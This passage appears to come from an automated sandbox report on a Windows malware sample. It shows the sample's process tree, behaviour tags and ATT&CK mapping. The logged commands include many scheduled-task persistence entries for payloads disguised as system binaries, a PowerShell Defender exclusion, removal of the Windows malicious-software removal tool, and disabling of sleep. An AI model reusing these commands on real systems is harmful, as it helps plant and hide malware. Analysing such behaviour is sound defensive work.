C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\msedge.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Webdriversession\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Webdriversession\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\security\templates\cmd.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\security\templates\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Windows\security\templates\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\spoolsv.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Webdriversession\spoolsv.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\spoolsv.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\Help\msedge.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\Help\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\Help\msedge.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Webdriversession\fontdrvhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Webdriversession\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Webdriversession\System.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Webdriversession\System.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Webdriversession\System.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe (depth 2)
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Webdriversession\StartMenuExperienceHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\WaaSMedicAgent.exe (depth 1)
C:\Windows\System32\WaaSMedicAgent.exe 7d4db10d5ea67053321c3cc5d87979af 6tMWMYUDMkOQcCpyS0MaFQ.0.1.0.0.0
-
C:\Windows\System32\Conhost.exe (depth 2)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
-
C:\Windows\servicing\TrustedInstaller.exe (depth 1)
C:\Windows\servicing\TrustedInstaller.exe
-
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe (depth 1)
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe (depth 2)
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\wusa.exe (depth 3)
wusa /uninstall /kb:890830 /quiet /norestart
-
C:\Windows\system32\powercfg.exe (depth 2)
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\powercfg.exe (depth 2)
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\powercfg.exe (depth 2)
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\powercfg.exe (depth 2)
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
-
C:\Windows\system32\dialer.exe (depth 2)
C:\Windows\system32\dialer.exe
-
C:\Windows\system32\dialer.exe (depth 2)
C:\Windows\system32\dialer.exe
-
C:\Windows\system32\dialer.exe (depth 2)
dialer.exe
- Modifies data under HKEY_USERS
-
C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe (depth 1)
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
-
C:\Windows\System32\mousocoreworker.exe (depth 1)
C:\Windows\System32\mousocoreworker.exe -Embedding
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -pss -s 444 -p 7444 -ip 7444
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
C:\Windows\system32\WerFault.exe -pss -s 420 -p 6092 -ip 6092
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
-
C:\Windows\system32\wbem\WmiApSrv.exe (depth 1)
C:\Windows\system32\wbem\WmiApSrv.exe
-
C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- System Services (2)
- Service Execution (2)
- Scheduled Task/Job (1)
Persistence
- Create or Modify System Process (2)
- Windows Service (2)
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process (2)
- Windows Service (2)
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads